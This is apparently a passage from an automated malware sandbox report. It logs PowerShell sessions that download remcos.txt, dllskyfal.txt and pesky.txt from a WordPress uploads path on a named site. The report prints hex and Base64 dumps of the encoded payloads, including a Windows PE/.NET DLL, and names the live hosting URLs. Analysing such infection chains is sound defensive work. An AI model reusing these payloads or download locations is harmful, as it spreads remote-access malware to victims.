82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82
                                  Data Ascii:
                                  2024-09-26 08:55:30 UTC14994INData Raw: 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81
                                  Data Ascii:
                                  2024-09-26 08:55:30 UTC16384INData Raw: 5a 53 52 57 5a 77 6c 48 56 35 78 32 5a 75 39 6d 63 30 4e 6c 4c 7a 78 32 62 76 52 6c 4c 7a 56 32 59 79 56 33 62 7a 56 6d 55 75 30 57 5a 30 4e 58 65 54 4e 44 e3 81 82 e3 81 82 e3 81 82 42 45 45 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 6a 4c 77 34 43 4d 75 45 54 4d 49 55 47 64 68 78 47 63 74 56 47 56 35 31 6b 43 e3 81 82 e3 81 82 e3 81 82 45 e3 81 82 e3 81 82 e3 81 82 47 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 51 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 45 e3 81 82 e3 81 82 e3 81 82 43 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3
                                  Data Ascii: ZSRWZwlHV5x2Zu9mc0NlLzx2bvRlLzV2YyV3bzVmUu0WZ0NXeTNDBEEjLw4CMuETMIUGdhxGctVGV51kCEGQEC
                                  2024-09-26 08:55:30 UTC16384INData Raw: e3 81 82 e3 81 82 67 67 45 e3 81 82 e3 81 82 e3 81 82 4d e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 6f e3 81 82 e3 81 82 e3 81 82 70 e3 81 82 e3 81 82 e3 81 82 49 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 6f e3 81 82 e3 81 82 e3 81 82 6e e3 81 82 e3 81 82 e3 81 82 45 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 73 e3 81 82 e3 81 82 e3 81 82 51 e3 81 82 e3 81 82 e3 81 82 49 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 45 77 35 e3 81 82 e3 81 82 e3 81 82 45 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 73 e3 81 82 e3 81 82 e3 81 82 51 e3 81 82 e3 81 82 e3 81 82 49 e3 81 82 e3
                                  Data Ascii: ggEMopIonEsQIEw5EsQI
                                  2024-09-26 08:55:30 UTC8089INData Raw: 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 77 51 e3 81 82 e3 81 82 e3 81 82 51 e3 81 82 e3 81 82 e3 81 82 4d 54 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 71 6f e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 4d 42 4b 43 34 68 4b 47 6f 67 42 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 51 44 6f e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 4c 57 45 77 4b 58 45 42 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 63 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 67 44 e3 81 82 e3 81 82 e3 81 82 45 e3 81 82 e3 81 82 e3 81 82 4d 54 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81
                                  Data Ascii: wQQMTqoMBKC4hKGogBQDoLWEwKXEBcgDEMT


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  5192.168.2.44974315.235.85.1944437924C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  TimestampBytes transferredDirectionData
                                  2024-09-26 08:55:30 UTC90OUTGET /wp-content/uploads/2024/07/remcos.txt HTTP/1.1
                                  Host: www.informacionoportuna.com
                                  2024-09-26 08:55:30 UTC212INHTTP/1.1 200 OK
                                  Connection: close
                                  content-type: text/plain
                                  last-modified: Tue, 02 Jul 2024 14:55:59 GMT
                                  accept-ranges: bytes
                                  content-length: 659456
                                  date: Thu, 26 Sep 2024 08:55:30 GMT
                                  server: LiteSpeed
                                  2024-09-26 08:55:30 UTC16384INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 38 67 4b 50 49 79 44 62 38 77 45 50 73 77 44 43 37 77 2f 4f 63 76 44 73 37 51 35 4f 30 74 44 56 37 41 7a 4f 51 6f 44 37 36 77 73 4f 73 71 44 6a 36 77 6d 4f 45 70 44 4b 36 41 68 4f 49 6f 44 42 36 41 51 4f 38 6e 44 2b 35 51 66 4f 67 4f 44 4e 7a 41 6a 4d 6b 4b 44 6f 79 51 6f 4d 41 4b 44 66 79 41 6e 4d 59 4a 44 53 79 67 6a 4d 6f 49 44 47 78 67 65 4d 59 48 44 31 78 41 64 4d 4d 48 44 79 78 51 63 4d 41 48 44 76 78 67 62 4d 73 47 44 71 78 51 61 4d 67 47 44 6e 78 67 5a 4d 55 47 44 6b 78 77 59 4d 49 47 44 65 78 51 58 4d 77 42 41 41 41 77 49 41 48 41 42
                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA8gKPIyDb8wEPswDC7w/OcvDs7Q5O0tDV7AzOQoD76wsOsqDj6wmOEpDK6AhOIoDB6AQO8nD+5QfOgODNzAjMkKDoyQoMAKDfyAnMYJDSygjMoIDGxgeMYHD1xAdMMHDyxQcMAHDvxgbMsGDqxQaMgGDnxgZMUGDkxwYMIGDexQXMwBAAAwIAHAB
                                  2024-09-26 08:55:30 UTC16384INData Raw: 41 45 41 41 41 41 41 41 37 4d 2b 4f 46 76 44 6c 37 6b 78 4f 48 6f 44 2b 35 6f 58 4f 64 6c 44 55 35 45 55 4f 64 6b 7a 46 34 63 4f 4f 4d 6a 6a 72 34 51 4b 4f 64 68 54 51 34 63 7a 4e 4e 66 6a 76 33 6b 37 4e 30 65 7a 62 33 6f 32 4e 58 59 6a 31 32 38 72 4e 2b 5a 44 63 32 6f 57 4e 63 58 6a 61 31 55 57 4e 57 52 7a 31 30 73 4c 4e 56 53 44 6b 30 6f 77 4d 77 4e 54 56 7a 41 31 4d 35 4d 54 4b 79 34 75 4d 53 4c 54 7a 79 49 72 4d 67 4b 7a 6a 79 67 6f 4d 36 4a 54 63 79 59 6d 4d 63 4a 54 55 79 63 6b 4d 34 49 54 4a 78 51 66 4d 49 48 7a 76 78 6b 61 4d 49 47 44 64 78 55 56 4d 47 46 44 4c 78 51 41 4d 78 44 54 32 77 6f 4b 4d 6b 43 7a 4e 41 41 41 41 67 43 41 41 77 44 41 41 41 38 7a 2f 2f 41 2f 50 6d 2f 44 31 2f 77 38 50 34 2b 6a 6a 2f 6b 34 50 6e 39 44 58 2f 45 30 50 37 38 6a
                                  Data Ascii: AEAAAAAA7M+OFvDl7kxOHoD+5oXOdlDU5EUOdkzF4cOOMjjr4QKOdhTQ4czNNfjv3k7N0ezb3o2NXYj128rN+ZDc2oWNcXja1UWNWRz10sLNVSDk0owMwNTVzA1M5MTKy4uMSLTzyIrMgKzjygoM6JTcyYmMcJTUyckM4ITJxQfMIHzvxkaMIGDdxUVMGFDLxQAMxDT2woKMkCzNAAAAgCAAwDAAA8z//A/Pm/D1/w8P4+jj/k4Pn9DX/E0P78j
                                  2024-09-26 08:55:30 UTC16384INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 2f 6e 58 65 61 2b 66 6b 52 61 38 2f 70 6d 36 32 2f 48 63 77 30 2f 2f 32 62 2f 2f 2f 33 66 2f 2f 2f 7a 4e 33 72 76 73 6b 53 65 4d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/nXea+fkRa8/pm62/Hcw0//2b///3f///zN3rvskSeMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                  2024-09-26 08:55:31 UTC16384INData Raw: 41 55 6b 6c 45 44 41 51 41 52 47 64 7a 42 6b 62 76 6c 47 64 77 56 32 59 34 56 32 58 6b 46 6d 59 57 46 30 50 75 41 41 41 41 41 41 41 46 5a 4a 78 41 41 41 51 41 52 47 64 7a 42 45 51 41 52 58 5a 30 46 47 64 7a 4a 57 54 66 56 46 52 45 42 45 64 32 4e 57 5a 6b 39 32 59 6b 38 6a 56 42 39 6a 4c 41 41 41 41 41 41 51 52 57 53 4d 41 41 42 45 5a 30 4e 48 51 45 42 55 5a 77 6c 48 64 6a 52 79 50 57 46 30 50 75 41 41 41 41 41 41 41 46 5a 4a 78 41 41 41 41 41 41 45 51 6b 52 33 63 41 56 32 63 68 4a 32 58 6c 42 58 65 30 4e 57 56 42 39 6a 4c 41 41 41 41 41 41 51 52 57 53 4d 41 41 41 45 51 6b 52 33 63 41 56 32 63 68 4a 32 58 30 5a 33 59 6c 52 32 62 6a 5a 56 51 2f 34 43 41 41 41 41 41 41 55 6b 6c 45 44 41 41 41 41 45 51 6b 52 33 63 41 56 47 64 6c 78 57 5a 6b 39 31 64 6c 35 32
                                  Data Ascii: AUklEDAQARGdzBkbvlGdwV2Y4V2XkFmYWF0PuAAAAAAAFZJxAAAQARGdzBEQARXZ0FGdzJWTfVFREBEd2NWZk92Yk8jVB9jLAAAAAAQRWSMAABEZ0NHQEBUZwlHdjRyPWF0PuAAAAAAAFZJxAAAAAAEQkR3cAV2chJ2XlBXe0NWVB9jLAAAAAAQRWSMAAAEQkR3cAV2chJ2X0Z3YlR2bjZVQ/4CAAAAAAUklEDAAAAEQkR3cAVGdlxWZk91dl52
                                  2024-09-26 08:55:31 UTC16384INData Raw: 41 41 41 41 41 38 2f 2f 2f 37 50 41 41 41 41 41 2f 2f 2f 2f 6f 43 41 41 41 41 77 2f 2f 2f 76 2f 41 4d 55 6f 30 41 77 51 68 71 43 41 41 41 41 41 41 4d 55 6f 6c 42 41 41 41 41 77 2f 2f 2f 76 2f 41 41 41 41 41 38 2f 2f 2f 44 4e 41 41 41 41 41 2f 2f 2f 2f 2b 44 41 41 41 45 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 52 6c 54 4a 41 41 41 51 41 5a 4d 5a 42 69 41 51 52 2b 78 34 2f 2f 2f 2f 2f 41 41 41 41 42 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 59 55 35 6f 42 41 41 41 45 51 47 54 57 67 49 41 55 6b 66 76 2b 2f 2f 2f 2f 50 41 41 41 51 42 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 6b 78 6b 46 49 43 41 44 4a 6c
                                  Data Ascii: AAAAA8///7PAAAAA////oCAAAAw///v/AMUo0AwQhqCAAAAAAMUolBAAAAw///v/AAAAA8///DNAAAAA////+DAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAgRlTJAAAQAZMZBiAQR+x4/////AAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAYU5oBAAAEQGTWgIAUkfv+////PAAAQBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAkxkFICADJl
                                  2024-09-26 08:55:31 UTC16384INData Raw: 79 55 7a 51 44 4e 55 51 32 6b 54 4d 44 56 30 51 46 46 30 4e 33 45 45 4d 43 68 44 4e 79 49 45 52 77 45 55 4d 34 55 6a 52 45 52 6b 4d 33 4d 44 4e 47 46 44 4f 45 52 7a 4d 32 63 7a 51 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 59 55 52 42 4a 7a 51 46 4e 44 52 45 56 45 4f 44 56 44 4f 42 4a 44 52 35 45 44 52 46 4a 54 51 34 51 45 4f 35 4d 6a 4e 31 59 7a 51 42 56 7a 4e 34 4d 54 4d 77 55 6a 52 34 67 44 4d 30 45 7a 4d 77 49 54 4d 78 51 54 4d 34 55 6b 52 46 5a 7a 51 35 51 55
                                  Data Ascii: yUzQDNUQ2kTMDV0QFF0N3EEMChDNyIERwEUM4UjRERkM3MDNGFDOERzM2czQGZkRGZkRGZkRGZkRGZkRGZkRGZkRGZkRGZkRGZkRGZkRGZkRGZkRGZkRGZkRGZkRAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYURBJzQFNDREVEODVDOBJDR5EDRFJTQ4QEO5MjN1YzQBVzN4MTMwUjR4gDM0EzMwITMxQTM4UkRFZzQ5QU
                                  2024-09-26 08:55:31 UTC16384INData Raw: 5a 68 42 39 75 5a 43 65 4a 30 38 4f 37 75 33 32 63 4f 6d 62 6f 6a 52 66 6e 43 42 72 5a 75 44 79 6c 49 78 73 50 58 64 4c 70 2b 47 30 54 79 58 61 64 42 6f 76 66 4f 38 72 31 4c 59 4f 33 37 6c 4c 59 6a 4c 36 51 32 34 45 43 62 76 66 47 4a 47 56 66 78 38 6d 71 68 6e 6b 4e 41 6c 4f 64 53 4f 4c 74 2b 4c 70 2f 63 72 6a 6d 6f 74 65 65 6a 53 70 31 48 34 7a 6d 53 39 43 32 67 70 79 69 36 50 6a 34 45 64 77 5a 6e 6b 54 48 66 34 4d 51 2b 75 49 39 78 43 32 57 42 2f 50 61 41 4b 2f 4d 53 4d 71 70 54 6d 49 48 52 4a 53 36 48 42 63 35 6d 5a 71 7a 61 42 62 72 45 38 34 51 66 6e 68 53 78 65 44 79 43 7a 38 63 37 35 4c 4c 31 52 4b 68 32 32 78 35 4c 54 45 75 75 62 50 34 4c 74 53 6b 30 58 68 47 48 42 49 45 65 70 49 41 4e 78 59 46 43 68 51 78 77 74 79 58 54 65 38 6a 68 62 37 38 6a 6d
                                  Data Ascii: ZhB9uZCeJ08O7u32cOmbojRfnCBrZuDylIxsPXdLp+G0TyXadBovfO8r1LYO37lLYjL6Q24ECbvfGJGVfx8mqhnkNAlOdSOLt+Lp/crjmoteejSp1H4zmS9C2gpyi6Pj4EdwZnkTHf4MQ+uI9xC2WB/PaAK/MSMqpTmIHRJS6HBc5mZqzaBbrE84QfnhSxeDyCz8c75LL1RKh22x5LTEuubP4LtSk0XhGHBIEepIANxYFChQxwtyXTe8jhb78jm
                                  2024-09-26 08:55:31 UTC16384INData Raw: 39 6b 44 2f 34 78 51 6b 68 33 78 50 55 43 6e 72 65 62 4a 67 41 30 44 4f 72 6c 67 2f 37 44 54 42 2f 73 34 56 64 61 72 33 41 41 51 50 2b 55 41 4f 74 45 31 39 62 38 44 66 44 67 71 43 6b 44 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 2f 6f 6c 65 73 39 72 4c 42 68 77 76 79 72 6e 38 63 66 58 73 31 41 6b 46 72 2b 70 66 59 6b 35 39 2f 77 76 61 43 77 74 6c 31 49 4e 77 6c 6b 4d 67 71 56 44 68 56 42 4d 43 54 6d 41 5a 70 45 59 50 41 56 54 69 55 59 38 6c 4f 6e 2f 66 77 44 41 41 41 41 41 41 42 38 48 38 41 41 41 41 41 41 51 41 2f 42 50 41 41 41 41 41 41 41 77 2f 77 44 41 41 41 41 41 41 41 4d 45 4d 41 41 41 41 41 41 41 41 44 42 44 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                  Data Ascii: 9kD/4xQkh3xPUCnrebJgA0DOrlg/7DTB/s4Vdar3AAQP+UAOtE19b8DfDgqCkDAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/oles9rLBhwvyrn8cfXs1AkFr+pfYk59/wvaCwtl1INwlkMgqVDhVBMCTmAZpEYPAVTiUY8lOn/fwDAAAAAAB8H8AAAAAAQA/BPAAAAAAAw/wDAAAAAAAMEMAAAAAAAADBDAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                  2024-09-26 08:55:31 UTC16384INData Raw: 39 47 69 61 45 42 4e 43 6c 32 7a 76 48 58 4e 49 6b 4b 43 41 41 30 4c 54 4a 71 4c 5a 79 72 56 56 2f 69 63 71 74 6d 41 53 67 43 51 76 41 78 78 59 6e 56 56 7a 43 38 62 79 39 56 6b 34 45 42 49 41 39 57 30 6c 75 42 6f 59 47 2f 78 76 4b 2f 55 37 61 74 4c 6f 41 30 72 53 62 6c 5a 36 66 6b 32 74 2f 75 73 4a 67 75 2f 67 67 44 51 76 6e 51 49 6b 4f 49 55 74 34 38 37 79 38 7a 56 48 62 42 4f 41 39 57 51 39 4e 54 75 6b 49 6e 7a 76 4d 50 4e 6d 6f 37 44 67 41 30 37 4b 6b 52 34 75 50 43 53 43 2f 32 4d 72 51 35 66 62 41 42 51 76 32 38 6d 70 7a 2f 50 2f 41 2f 72 7a 47 36 58 43 39 41 4d 41 39 32 54 46 32 42 53 78 53 46 38 76 50 2f 6c 71 2b 46 48 6f 41 30 4c 50 70 4a 48 79 54 55 65 51 2f 43 64 48 69 77 49 39 41 41 51 76 44 64 4d 4c 50 68 33 33 68 2b 4c 30 4d 69 46 6a 61 44 48
                                  Data Ascii: 9GiaEBNCl2zvHXNIkKCAA0LTJqLZyrVV/icqtmASgCQvAxxYnVVzC8by9Vk4EBIA9W0luBoYG/xvK/U7atLoA0rSblZ6fk2t/usJgu/ggDQvnQIkOIUt487y8zVHbBOA9WQ9NTukInzvMPNmo7DgA07KkR4uPCSC/2MrQ5fbABQv28mpz/P/A/rzG6XC9AMA92TF2BSxSF8vP/lq+FHoA0LPpJHyTUeQ/CdHiwI9AAQvDdMLPh33h+L0MiFjaDH
                                  2024-09-26 08:55:31 UTC16384INData Raw: 41 34 47 41 68 42 77 59 41 6b 47 41 79 42 51 5a 41 30 47 41 68 42 41 41 41 41 41 41 6f 42 77 63 41 6b 47 41 73 42 77 5a 41 34 47 41 6c 42 41 49 41 34 47 41 68 42 77 59 41 6b 47 41 79 42 51 5a 41 30 47 41 68 42 41 41 41 41 41 41 75 42 51 59 41 4d 47 41 70 42 67 63 41 55 47 41 74 42 51 59 41 55 45 75 45 41 51 52 34 43 4b 41 46 74 4c 70 41 55 45 75 55 2b 44 34 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 77 2f 34 44 41 41 41 41 41 41 41 41 41 45 41 41 41 41 41 41 41 41 2f 42 4f 41 41 41 41 41 41 41 77 2f 67 44 41 41 41 41 41 41 41 41 49 41 41 41 41 41 41 41 41 41 2f 44 50 41 41 41 41 41 41 41 77 66 77 44 41 41 41 41 41 41 41 38 48 38 41 41 41 41 41 41 51 41 2f 65 66 46 48 42 45 41 41 41 77 2f 2f 2f 2f 2f 34 44 41 41 41 38 6a 35 75 49 6b 2f 36 6e 7a
                                  Data Ascii: A4GAhBwYAkGAyBQZA0GAhBAAAAAAoBwcAkGAsBwZA4GAlBAIA4GAhBwYAkGAyBQZA0GAhBAAAAAAuBQYAMGApBgcAUGAtBQYAUEuEAQR4CKAFtLpAUEuU+D4AAAAAAAAAAAAAAAAAAw/4DAAAAAAAAAEAAAAAAAA/BOAAAAAAAw/gDAAAAAAAAIAAAAAAAAA/DPAAAAAAAwfwDAAAAAAA8H8AAAAAAQA/efFHBEAAAw/////4DAAA8j5uIk/6nz


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  6192.168.2.44974415.235.85.1944437728C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  TimestampBytes transferredDirectionData
                                  2024-09-26 08:55:36 UTC117OUTGET /wp-content/uploads/2024/09/dllskyfal.txt HTTP/1.1
                                  Host: www.informacionoportuna.com
                                  Connection: Keep-Alive
                                  2024-09-26 08:55:37 UTC211INHTTP/1.1 200 OK
                                  Connection: close
                                  content-type: text/plain
                                  last-modified: Mon, 16 Sep 2024 03:18:42 GMT
                                  accept-ranges: bytes
                                  content-length: 11608
                                  date: Thu, 26 Sep 2024 08:55:36 GMT
                                  server: LiteSpeed
                                  2024-09-26 08:55:37 UTC1157INData Raw: 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 44 41 4c 6d 64 35 32 59 41 41 41 41 41 41 41 41 41 41 4f 41 41 49 69 41 4c 41 56 41 41 41 42 6f 41 41 41 41 47 41 41 41 41 41 41 41 41 6a 6a 67 41 41 41 41 67 41 41 41 41 41 41 41 41 41 41 41 41 45 41 41 67 41 41 41 41 41 67 41
                                  Data Ascii: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDALmd52YAAAAAAAAAAOAAIiALAVAAABoAAAAGAAAAAAAAjjgAAAAgAAAAAAAAAAAAEAAgAAAAAgA
                                  2024-09-26 08:55:37 UTC10451INData Raw: 77 49 41 41 41 72 2b 41 52 4d 4d 45 51 77 35 41 67 45 41 41 41 41 62 6a 51 59 41 41 41 45 6c 46 6e 4a 52 41 41 42 77 6f 69 55 58 42 4b 49 6c 47 48 49 4f 41 51 42 77 6f 69 55 5a 4b 41 6f 41 41 41 71 69 4a 52 70 79 64 41 45 41 63 4b 49 6f 43 77 41 41 43 68 4d 4e 4b 41 6f 41 41 41 70 79 33 67 45 41 63 43 67 4d 41 41 41 4b 45 51 30 6f 44 51 41 41 43 67 42 79 37 67 45 41 63 43 67 4b 41 41 41 4b 63 74 34 42 41 48 41 6f 44 67 41 41 43 68 59 57 46 53 67 50 41 41 41 4b 4a 68 75 4e 42 67 41 41 41 53 55 57 63 6f 6b 43 41 48 43 69 4a 52 63 44 6f 69 55 59 63 72 38 43 41 48 43 69 4a 52 6b 6f 43 67 41 41 43 71 49 6c 47 6e 4c 68 41 67 42 77 6f 69 67 4c 41 41 41 4b 46 68 59 56 4b 41 38 41 41 41 6f 6d 63 75 55 43 41 48 41 54 44 68 75 4e 42 67 41 41 41 53 55 57 45 51 36 69
                                  Data Ascii: wIAAAr+ARMMEQw5AgEAAAAbjQYAAAElFnJRAABwoiUXBKIlGHIOAQBwoiUZKAoAAAqiJRpydAEAcKIoCwAAChMNKAoAAApy3gEAcCgMAAAKEQ0oDQAACgBy7gEAcCgKAAAKct4BAHAoDgAAChYWFSgPAAAKJhuNBgAAASUWcokCAHCiJRcDoiUYcr8CAHCiJRkoCgAACqIlGnLhAgBwoigLAAAKFhYVKA8AAAomcuUCAHATDhuNBgAAASUWEQ6i


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  7192.168.2.44974515.235.85.1944437728C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  TimestampBytes transferredDirectionData
                                  2024-09-26 08:55:37 UTC89OUTGET /wp-content/uploads/2024/09/pesky.txt HTTP/1.1
                                  Host: www.informacionoportuna.com
                                  2024-09-26 08:55:37 UTC211INHTTP/1.1 200 OK
                                  Connection: close
                                  content-type: text/plain
                                  last-modified: Mon, 16 Sep 2024 02:52:42 GMT
                                  accept-ranges: bytes
                                  content-length: 57008
                                  date: Thu, 26 Sep 2024 08:55:37 GMT
                                  server: LiteSpeed
                                  2024-09-26 08:55:37 UTC1157INData Raw: e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82
                                  Data Ascii:
